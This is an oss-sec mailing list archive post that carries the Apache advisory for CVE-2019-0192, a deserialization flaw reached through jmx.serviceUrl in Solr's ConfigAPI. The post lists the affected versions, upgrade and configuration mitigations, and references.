oss-sec mailing list archives
CVE-2019-0192 Deserialization of untrusted data via jmx.serviceUrl in Apache Solr
From: Tomas Fernandez Lobbe <tflobbe () apache org>
Date: Wed, 6 Mar 2019 22:41:37 -0800
Severity: High Vendor: The Apache Software Foundation Versions Affected: 5.0.0 to 5.5.5 6.0.0 to 6.6.5 Description: ConfigAPI allows to configure Solr's JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side. Mitigation: Any of the following are enough to prevent this vulnerability: * Upgrade to Apache Solr 7.0 or later. * Disable the ConfigAPI if not in use, by running Solr with the system property “disable.configEdit=true” * If upgrading or disabling the Config API are not viable options, apply patch in [1] and re-compile Solr. * Ensure your network settings are configured so that only trusted traffic is allowed to ingress/egress your hosts running Solr. Credit: Michael Stepankin References: [1] https://issues.apache.org/jira/browse/SOLR-13301 [2] https://wiki.apache.org/solr/SolrSecurity
Current thread:
- CVE-2019-0192 Deserialization of untrusted data via jmx.serviceUrl in Apache Solr Tomas Fernandez Lobbe (Mar 07)